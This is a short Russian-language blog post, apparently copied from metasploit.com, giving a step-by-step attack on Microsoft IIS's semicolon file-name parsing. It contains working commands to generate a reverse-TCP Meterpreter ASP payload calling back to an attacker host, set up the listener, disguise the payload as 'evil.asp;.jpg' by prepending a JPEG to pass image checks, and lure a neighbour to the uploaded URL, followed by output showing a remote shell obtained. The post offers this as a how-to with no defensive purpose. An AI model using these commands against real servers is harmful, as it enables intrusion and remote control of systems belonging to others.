mardi 16 février 2010

Эксплуатируем Microsoft IIS

Предположим, что у нас имеется Веб приложение, которое позволяет пользователям загружать изображения на сервер. Чтоб усложнить задачу, также предположим, что приложение проверяет является ли загружаемый файл действительно изображением.

Сначала мы сгенерируем ASP скрипт, который подключит Meterpreter назад, к нашей машине:
$ msfpayload windows/meterpreter/reverse_tcp \
LHOST=1.2.3.4 LPORT=8443 R | \
msfencode -o evil.asp

Теперь нам нужно сделать так, чтобы msfconsole приняло входящее соединение:
$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j

Чтоб обойти проверку на содержание изображения, мы предварим наш ASP скрипт изображением в формате JPG:
$ cat happy.jpg evil.asp > "evil.asp;.jpg"
$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02

Теперь отправляем наше «evil.asp;. Jpg" изображение через выбранное Веб приложение. Так как расширение нашего файла оканчивается на "jpg", а содержание файла кажется JPEG , Веб приложение принимает наш файл и переименовывает его в "/ images / evil.asp;. Jpg"

Наконец мы впариваем URL ссылку (с нашим изображением) нашему соседу и когда он по ней переходит - это активирует нашу начинку и создаст сессию снашей msfconsole:
[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami

nt authority\network service
Extrait de metasploit.com

1 commentaire:

  1. а где должен появиться файл с картинкой?

    RépondreSupprimer